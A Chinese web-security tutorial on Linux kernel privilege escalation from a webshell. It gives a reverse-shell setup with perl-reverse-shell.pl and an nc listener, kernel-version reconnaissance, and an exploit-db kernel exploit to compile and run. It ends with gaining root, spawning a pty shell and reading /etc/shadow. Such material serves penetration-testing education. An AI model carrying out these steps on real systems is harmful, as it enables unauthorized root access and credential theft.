天天看點

linux核心提權,WEB安全第六章提權篇01 LINUX 核心漏洞提權

WEB安全第六章提權篇01 LINUX 核心漏洞提權

1、簡介

通常我們在擁有一個webshell的時候,一般權限都是WEB容器權限,如在iis就是iis使用者組權限,在apache 就是apache權限,一般都是權限較低,均可執行一些普通指令,如檢視目前使用者,網絡資訊,ip資訊等。如果我想進行内網滲透就必須将權限提權到最高,如系統權限 超級管理者權限。

2、建立互動shell

linux 提權 需要互動shell

可以使用工具 perl-reverse-shell.pl 建立 sockets

增加運作權限

chmod +x perl-reverse-shell.pl

本地使用nc 監聽端口

nc -vvlp 1234

http://www.moontester.com/upload/ec69e40706de8558e71cd85cd17589b3x.php

linux核心提權,WEB安全第六章提權篇01 LINUX 核心漏洞提權

nc 監聽

linux核心提權,WEB安全第六章提權篇01 LINUX 核心漏洞提權

3、檢視發行版

cat /etc/issue

cat /etc/*release

檢視核心版本

uname -a

4、查找可用的提權exp

https://www.exploit-db.com/

Linux

moonteam-virtual-machine 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32

:37 UTC 2015

x86_64 x86_64 x86_64 GNU/Linux

https://www.exploit-db.com/exploits/37292

5、進行提權

在目标機子編譯提權exp 如果編譯不成功在本地編譯後在上傳的目标上

gcc exp.c  -o exp

增加運作權限 chmod +x exp

運作 ./exp

linux核心提權,WEB安全第六章提權篇01 LINUX 核心漏洞提權

目前使用者從www-data提權到 root

切換shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’

查詢目前使用者 id

查詢密文檔案

cat /etc/shadow

linux核心提權,WEB安全第六章提權篇01 LINUX 核心漏洞提權

原創文章,作者:mOon,如若轉載,請注明出處:https://www.moonsec.com/archives/379